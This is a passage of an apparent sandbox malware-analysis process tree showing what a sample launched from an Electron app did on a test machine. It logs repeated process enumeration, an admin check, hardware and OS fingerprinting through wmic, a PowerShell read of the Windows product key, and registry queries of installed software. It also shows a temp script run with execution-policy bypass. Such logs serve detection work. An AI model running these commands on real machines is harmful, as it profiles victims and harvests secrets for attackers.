    PID:8552
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /d /s /c "tasklist"
  2⤵
  PID:1996
- - C:\Windows\system32\tasklist.exe
    tasklist
    3⤵
    - Enumerates processes with tasklist
    PID:8048
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /d /s /c "tasklist"
  2⤵
  PID:3596
- - C:\Windows\system32\tasklist.exe
    tasklist
    3⤵
    - Enumerates processes with tasklist
    PID:7852
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /d /s /c "tasklist"
  2⤵
  PID:1076
- - C:\Windows\system32\tasklist.exe
    tasklist
    3⤵
    - Enumerates processes with tasklist
    PID:7844
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /d /s /c "tasklist"
  2⤵
  PID:3920
- - C:\Windows\system32\tasklist.exe
    tasklist
    3⤵
    - Enumerates processes with tasklist
    PID:8860
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /d /s /c "tasklist"
  2⤵
  PID:3152
- - C:\Windows\system32\tasklist.exe
    tasklist
    3⤵
    PID:8364
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /d /s /c "tasklist"
  2⤵
  PID:3132
- - C:\Windows\system32\tasklist.exe
    tasklist
    3⤵
    - Enumerates processes with tasklist
    PID:7712
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /d /s /c "tasklist"
  2⤵
  PID:1964
- - C:\Windows\system32\tasklist.exe
    tasklist
    3⤵
    - Enumerates processes with tasklist
    PID:7884
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /d /s /c "tasklist"
  2⤵
  PID:128
- - C:\Windows\system32\tasklist.exe
    tasklist
    3⤵
    - Enumerates processes with tasklist
    PID:8560
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /d /s /c "tasklist"
  2⤵
  PID:4208
- - C:\Windows\system32\tasklist.exe
    tasklist
    3⤵
    - Enumerates processes with tasklist
    PID:7732
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /d /s /c "tasklist"
  2⤵
  PID:1912
- - C:\Windows\system32\tasklist.exe
    tasklist
    3⤵
    - Enumerates processes with tasklist
    PID:8184
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /d /s /c "tasklist"
  2⤵
  PID:2412
- - C:\Windows\system32\tasklist.exe
    tasklist
    3⤵
    - Enumerates processes with tasklist
    PID:8260
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /d /s /c "tasklist"
  2⤵
  PID:3004
- - C:\Windows\system32\tasklist.exe
    tasklist
    3⤵
    PID:7836
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /d /s /c "tasklist"
  2⤵
  PID:2936
- - C:\Windows\system32\tasklist.exe
    tasklist
    3⤵
    - Enumerates processes with tasklist
    PID:7740
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /d /s /c "tasklist"
  2⤵
  PID:5128
- - C:\Windows\system32\tasklist.exe
    tasklist
    3⤵
    - Enumerates processes with tasklist
    PID:8544
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /d /s /c "tasklist"
  2⤵
  PID:5148
- - C:\Windows\system32\tasklist.exe
    tasklist
    3⤵
    - Enumerates processes with tasklist
    PID:8068
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /d /s /c "tasklist"
  2⤵
  PID:5160
- - C:\Windows\system32\tasklist.exe
    tasklist
    3⤵
    PID:7952
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /d /s /c "tasklist"
  2⤵
  PID:5168
- - C:\Windows\system32\tasklist.exe
    tasklist
    3⤵
    - Enumerates processes with tasklist
    PID:8084
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /d /s /c "tasklist"
  2⤵
  PID:5176
- - C:\Windows\system32\tasklist.exe
    tasklist
    3⤵
    PID:8388
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /d /s /c "tasklist"
  2⤵
  PID:5184
- - C:\Windows\system32\tasklist.exe
    tasklist
    3⤵
    - Enumerates processes with tasklist
    PID:7752
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /d /s /c "tasklist"
  2⤵
  PID:5204
- - C:\Windows\system32\tasklist.exe
    tasklist
    3⤵
    - Enumerates processes with tasklist
    PID:7936
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /d /s /c "tasklist"
  2⤵
  PID:5224
- - C:\Windows\system32\tasklist.exe
    tasklist
    3⤵
    - Enumerates processes with tasklist
    PID:8092
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /d /s /c "tasklist"
  2⤵
  PID:5248
- - C:\Windows\system32\tasklist.exe
    tasklist
    3⤵
    - Enumerates processes with tasklist
    PID:8204
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /d /s /c "tasklist"
  2⤵
  PID:5264
- - C:\Windows\system32\tasklist.exe
    tasklist
    3⤵
    - Enumerates processes with tasklist
    PID:8032
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /d /s /c "tasklist"
  2⤵
  PID:5284
- - C:\Windows\system32\tasklist.exe
    tasklist
    3⤵
    - Enumerates processes with tasklist
    - Suspicious use of AdjustPrivilegeToken
    PID:7484
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /d /s /c "tasklist"
  2⤵
  PID:5300
- - C:\Windows\system32\tasklist.exe
    tasklist
    3⤵
    - Enumerates processes with tasklist
    PID:8508
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /d /s /c "tasklist"
  2⤵
  PID:5324
- - C:\Windows\system32\tasklist.exe
    tasklist
    3⤵
    PID:7872
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /d /s /c "tasklist"
  2⤵
  PID:5344
- - C:\Windows\system32\tasklist.exe
    tasklist
    3⤵
    - Enumerates processes with tasklist
    PID:8000
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /d /s /c "net session"
  2⤵
  PID:5368
- - C:\Windows\system32\net.exe
    net session
    3⤵
    PID:7668
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 session
      4⤵
      PID:8152
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /d /s /c "C:\Users\Admin\AppData\Local\Temp\resources\app.asar.unpacked\bind\main.exe"
  2⤵
  PID:5388
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /d /s /c "wmic csproduct get uuid"
  2⤵
  PID:5396
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic csproduct get uuid
    3⤵
    PID:8140
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /d /s /c "wmic OS get caption, osarchitecture | more +1"
  2⤵
  PID:5420
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic OS get caption, osarchitecture
    3⤵
    PID:8020
- - C:\Windows\system32\more.com
    more +1
    3⤵
    PID:8292
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /d /s /c "wmic cpu get name | more +1"
  2⤵
  PID:10888
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get name
    3⤵
    PID:10928
- - C:\Windows\system32\more.com
    more +1
    3⤵
    PID:10936
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /d /s /c "wmic PATH Win32_VideoController get name | more +1"
  2⤵
  PID:10980
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic PATH Win32_VideoController get name
    3⤵
    - Detects videocard installed
    PID:11024
- - C:\Windows\system32\more.com
    more +1
    3⤵
    PID:11032
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /d /s /c "powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\SoftwareProtectionPlatform' -Name BackupProductKeyDefault"
  2⤵
  PID:11076
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\SoftwareProtectionPlatform' -Name BackupProductKeyDefault
    3⤵
    - Suspicious behavior: EnumeratesProcesses
    PID:11116
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /d /s /c "powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion' -Name ProductName"
  2⤵
  PID:9616
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion' -Name ProductName
    3⤵
    - Suspicious behavior: EnumeratesProcesses
    PID:9000
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /d /s /c "tasklist"
  2⤵
  PID:10956
- - C:\Windows\system32\tasklist.exe
    tasklist
    3⤵
    PID:10912
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /d /s /c "wmic process where processid=NaN get ExecutablePath"
  2⤵
  PID:11216
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic process where processid=NaN get ExecutablePath
    3⤵
    PID:10932
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /d /s /c "C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall""
  2⤵
  PID:10972
- - C:\Windows\system32\reg.exe
    C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall"
    3⤵
    PID:9000
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /d /s /c "C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall""
  2⤵
  PID:10212
- - C:\Windows\system32\reg.exe
    C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall"
    3⤵
    PID:10276
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /d /s /c "C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\7-Zip""
  2⤵
  PID:8940
- - C:\Windows\system32\reg.exe
    C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\7-Zip"
    3⤵
    PID:11028
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /d /s /c "C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\AddressBook""
  2⤵
  PID:3316
- - C:\Windows\system32\reg.exe
    C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\AddressBook"
    3⤵
    PID:3840
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /d /s /c "C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\Connection Manager""
  2⤵
  PID:8932
- - C:\Windows\system32\reg.exe
    C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\Connection Manager"
    3⤵
    PID:7064
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /d /s /c "C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\DirectDrawEx""
  2⤵
  PID:1056
- - C:\Windows\system32\reg.exe
    C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\DirectDrawEx"
    3⤵
    PID:5324
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /d /s /c "C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\DXM_Runtime""
  2⤵
  PID:10980
- - C:\Windows\system32\reg.exe
    C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\DXM_Runtime"
    3⤵
    PID:6852
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /d /s /c "C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\Fontcore""
  2⤵
  PID:11020
- - C:\Windows\system32\reg.exe
    C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\Fontcore"
    3⤵
    PID:11004
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /d /s /c "C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\IE40""
  2⤵
  PID:3572
- - C:\Windows\system32\reg.exe
    C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\IE40"
    3⤵
    PID:7020
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /d /s /c "C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\IE4Data""
  2⤵
  PID:6132
- - C:\Windows\system32\reg.exe
    C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\IE4Data"
    3⤵
    PID:3996
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /d /s /c "C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\IE5BAKEX""
  2⤵
  PID:1876
- - C:\Windows\system32\reg.exe
    C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\IE5BAKEX"
    3⤵
    PID:7752
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /d /s /c "C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\IEData""
  2⤵
  PID:5840
- - C:\Windows\system32\reg.exe
    C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\IEData"
    3⤵
    PID:7312
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /d /s /c "C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\MobileOptionPack""
  2⤵
  PID:11168
- - C:\Windows\system32\reg.exe
    C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\MobileOptionPack"
    3⤵
    PID:9288
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /d /s /c "C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\Mozilla Firefox 105.0.3 (x64 en-US)""
  2⤵
  PID:7328
- - C:\Windows\System32\Conhost.exe
    \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
    3⤵
    PID:8448
- - C:\Windows\system32\reg.exe
    C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\Mozilla Firefox 105.0.3 (x64 en-US)"
    3⤵
    PID:7820
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /d /s /c "C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\MozillaMaintenanceService""
  2⤵
  PID:7624
- - C:\Windows\system32\reg.exe
    C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\MozillaMaintenanceService"
    3⤵
    PID:6292
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /d /s /c "C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\MPlayer2""
  2⤵
  PID:8276
- - C:\Windows\system32\reg.exe
    C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\MPlayer2"
    3⤵
    PID:3136
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /d /s /c "C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\ProPlusRetail - en-us""
  2⤵
  PID:5232
- - C:\Windows\system32\reg.exe
    C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\ProPlusRetail - en-us"
    3⤵
    PID:10068
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /d /s /c "C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\SchedulingAgent""
  2⤵
  PID:5556
- - C:\Windows\system32\reg.exe
    C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\SchedulingAgent"
    3⤵
    PID:7060
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /d /s /c "C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\VLC media player""
  2⤵
  PID:6000
- - C:\Windows\system32\reg.exe
    C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\VLC media player"
    3⤵
    PID:7704
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /d /s /c "C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\WIC""
  2⤵
  PID:7236
- - C:\Windows\System32\Conhost.exe
    \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
    3⤵
    PID:8396
- - C:\Windows\system32\reg.exe
    C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\WIC"
    3⤵
    PID:9188
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /d /s /c "C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{113C0ADC-B9BD-4F95-9653-4F5BC540ED03}""
  2⤵
  PID:8280
- - C:\Windows\system32\reg.exe
    C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{113C0ADC-B9BD-4F95-9653-4F5BC540ED03}"
    3⤵
    PID:2356
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /d /s /c "C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{1D8E6291-B0D5-35EC-8441-6616F567A0F7}""
  2⤵
  PID:8548
- - C:\Windows\system32\reg.exe
    C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{1D8E6291-B0D5-35EC-8441-6616F567A0F7}"
    3⤵
    PID:6992
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /d /s /c "C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{3544B2EE-E62F-4D11-B79C-3DDEACE94DA5}""
  2⤵
  PID:9028
- - C:\Windows\system32\reg.exe
    C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{3544B2EE-E62F-4D11-B79C-3DDEACE94DA5}"
    3⤵
    PID:6352
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /d /s /c "C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{37B8F9C7-03FB-3253-8781-2517C99D7C00}""
  2⤵
  PID:1884
- - C:\Windows\system32\reg.exe
    C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{37B8F9C7-03FB-3253-8781-2517C99D7C00}"
    3⤵
    PID:7088
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /d /s /c "C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{3A706840-2882-423C-90EB-B31545E2BC7A}""
  2⤵
  PID:11156
- - C:\Windows\system32\reg.exe
    C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{3A706840-2882-423C-90EB-B31545E2BC7A}"
    3⤵
    PID:10124
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /d /s /c "C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{5740BD44-B58D-321A-AFC0-6D3D4556DD6C}""
  2⤵
  PID:1720
- - C:\Windows\system32\reg.exe
    C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{5740BD44-B58D-321A-AFC0-6D3D4556DD6C}"
    3⤵
    PID:11140
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /d /s /c "C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{5FCE6D76-F5DC-37AB-B2B8-22AB8CEDB1D4}""
  2⤵
  PID:6444
- - C:\Windows\system32\reg.exe
    C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{5FCE6D76-F5DC-37AB-B2B8-22AB8CEDB1D4}"
    3⤵
    PID:7120
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /d /s /c "C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{64A3A4F4-B792-11D6-A78A-00B0D0180381}""
  2⤵
  PID:2660
- - C:\Windows\system32\reg.exe
    C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{64A3A4F4-B792-11D6-A78A-00B0D0180381}"
    3⤵
    PID:956
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /d /s /c "C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{662A0088-6FCD-45DD-9EA7-68674058AED5}""
  2⤵
  PID:6276
- - C:\Windows\system32\reg.exe
    C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{662A0088-6FCD-45DD-9EA7-68674058AED5}"
    3⤵
    PID:7880
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /d /s /c "C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{6DB765A8-05AF-49A1-A71D-6F645EE3CE41}""
  2⤵
  PID:8004
- - C:\Windows\system32\reg.exe
    C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{6DB765A8-05AF-49A1-A71D-6F645EE3CE41}"
    3⤵
    PID:9688
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /d /s /c "C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{76DEEAB3-122F-4231-83C7-0C35363D02F9}""
  2⤵
  PID:8460
- - C:\Windows\system32\reg.exe
    C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{76DEEAB3-122F-4231-83C7-0C35363D02F9}"
    3⤵
    PID:4900
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /d /s /c "C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{77924AE4-039E-4CA4-87B4-2F64180381F0}""
  2⤵
  PID:6988
- - C:\Windows\system32\reg.exe
    C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{77924AE4-039E-4CA4-87B4-2F64180381F0}"
    3⤵
    PID:4092
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /d /s /c "C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{90160000-007E-0000-1000-0000000FF1CE}""
  2⤵
  PID:7680
- - C:\Windows\system32\reg.exe
    C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{90160000-007E-0000-1000-0000000FF1CE}"
    3⤵
    PID:4428
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /d /s /c "C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{90160000-008C-0000-1000-0000000FF1CE}""
  2⤵
  PID:7132
- - C:\Windows\system32\reg.exe
    C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{90160000-008C-0000-1000-0000000FF1CE}"
    3⤵
    PID:2344
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /d /s /c "C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{90160000-008C-0409-1000-0000000FF1CE}""
  2⤵
  PID:5488
- - C:\Windows\system32\reg.exe
    C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{90160000-008C-0409-1000-0000000FF1CE}"
    3⤵
    PID:3416
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /d /s /c "C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{AE86D888-1404-47CC-A7BB-8D86C0503E58}""
  2⤵
  PID:5580
- - C:\Windows\system32\reg.exe
    C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{AE86D888-1404-47CC-A7BB-8D86C0503E58}"
    3⤵
    PID:6868
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /d /s /c "C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{C7141A99-592B-4226-A4E9-B767C1D0FBAF}""
  2⤵
  PID:11188
- - C:\Windows\system32\reg.exe
    C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{C7141A99-592B-4226-A4E9-B767C1D0FBAF}"
    3⤵
    PID:9532
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /d /s /c "C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{CB0836EC-B072-368D-82B2-D3470BF95707}""
  2⤵
  PID:9256
- - C:\Windows\system32\reg.exe
    C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{CB0836EC-B072-368D-82B2-D3470BF95707}"
    3⤵
    PID:7244
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /d /s /c "C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{CF2BEA3C-26EA-32F8-AA9B-331F7E34BA97}""
  2⤵
  PID:7620
- - C:\Windows\system32\reg.exe
    C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{CF2BEA3C-26EA-32F8-AA9B-331F7E34BA97}"
    3⤵
    PID:8516
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /d /s /c "C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{D44822A8-FC28-42FC-8B1D-21A78579FC79}""
  2⤵
  PID:2684
- - C:\Windows\system32\reg.exe
    C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{D44822A8-FC28-42FC-8B1D-21A78579FC79}"
    3⤵
    PID:4720
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /d /s /c "C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{E016F2B9-01FE-4FAA-882E-ECC43FA49751}""
  2⤵
  PID:5584
- - C:\Windows\system32\reg.exe
    C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{E016F2B9-01FE-4FAA-882E-ECC43FA49751}"
    3⤵
    PID:2172
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /d /s /c "powershell -ExecutionPolicy Bypass -NoProfile -File "C:\Users\Admin\AppData\Local\Temp\O6urZJ6LVB4I_tezmp.ps1""
  2⤵
  PID:8080
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    powershell -ExecutionPolicy Bypass -NoProfile -File "C:\Users\Admin\AppData\Local\Temp\O6urZJ6LVB4I_tezmp.ps1"
    3⤵
    - Suspicious behavior: EnumeratesProcesses
    PID:5800
- C:\Windows\system32\cmd.exe
